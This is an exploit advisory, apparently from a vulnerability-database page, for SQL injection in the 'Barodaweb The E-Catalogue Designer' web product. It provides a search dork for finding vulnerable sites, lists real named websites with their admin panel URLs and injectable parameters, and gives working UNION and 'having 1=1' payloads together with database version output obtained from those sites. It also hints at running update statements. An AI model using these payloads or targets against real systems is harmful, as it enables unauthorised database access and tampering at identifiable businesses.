Barodaweb The E-Catalogue Designer SQL Injection

2015.12.20
Credit: Ashiyane Digital Security Team
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89
Dork: intext:"Powered By: Barodaweb The E-Catalogue Designer" inurl:id

[*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*] [*] [*] Exploit Title : Barodaweb The E-Catalogue Designer SQL Injection [*] [*] Exploit Author : Ashiyane Digital Security Team [*] [*] Dork : intext:"Powered By: Barodaweb The E-Catalogue Designer" inurl:id [*] [*] Vendor Homepage : www.barodaweb.com [*] [*] Data : 2015.12.19 [*] [*] Tested On : Win 7 / FireFox [*] [*] DB : SQL SERVER (MSSQL) [*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*] [*] [*] Admin Page Demo : [*] [*]http://shobhatanks.com/admin/ [*]http://www.chemtraders.in/admin/ [*]http://www.almac-machinery.com/admin/ [*]http://www.timescanindia.in/admin/ [*]http://aquaservices.co.in/admin/ [*] [*] Vulnerabilities Demo : [*] [*] http://www.gripholdindia.com/Services.aspx?Id=[sql] [*] [*] http://aquaservices.co.in/Product.aspx?Id=[sql] [*] [*] http://www.tithicreations.com/Product.aspx?ID=3&SID=[sql] [*] [*] http://www.timescanindia.in/Downloads.aspx?Id=[sql] [*] [*] http://shobhatanks.com/ProductDetails.aspx?Id=[sql] [*] [*] http://www.almac-machinery.com/Catgeory.aspx?Id=[sql] [*] [*] http://labourlawadvisor.com/News.aspx?Id=[sql] [*] [*] http://www.chemtraders.in/Product.aspx?Id=[sql] [*] [*] http://www.utechfasten.in/ProductTools.aspx?Id=[sql] [*] ,.... [*] [*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*] [*] [*] Exploit Examples : [*] [*] http://www.gripholdindia.com/Services.aspx?Id=1' and 1=0 UNION all SELECT 1,@@version,3,4-- - [*] [*] Version : [*] Microsoft SQL Server 2005 - 9.00.4060.00 (Intel X86) Mar 17 2011 13:20:38 Copyright (c) 1988-2005 [*] [*] [*] Microsoft Corporation Express Edition on Windows NT 6.1 (Build 7601: Service Pack 1) [*] [*] [*] Exploit Examples : [*] [*] http://www.bpcindia.org/Download.aspx?id=9 and 1=0 union all select 1,2,3,@@version,5,6,7 -- - [*] [*] Version : [*] Microsoft SQL Server 2008 R2 (SP1) - 10.50.2550.0 (X64) Jun 11 2012 16:41:53 Copyright (c) Microsoft [*] [*]Corporation Express Edition with Advanced Services (64-bit) on Windows NT 6.1 (Build 7601: Service Pack 1) [*] [*] [*] Exploit Examples without using admin page : [*] [*] http://www.alXmac-machinery.com/Catgeory.aspx?Id=1' having 1=1-- - [*] http://labourlXawadvisor.com/News.aspx?Id=7' having 1=1 -- - [*] http://www.Xchemtraders.in/Product.aspx?Id=14 having 1=1 -- - [*] http://aquaXservices.co.in/Product.aspx?Id=4 having 1=1-- - [*] [*](Use Update Statement) [*] [*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*] [*] [*] Discovered by : V For Vendetta [*] [*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*]


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top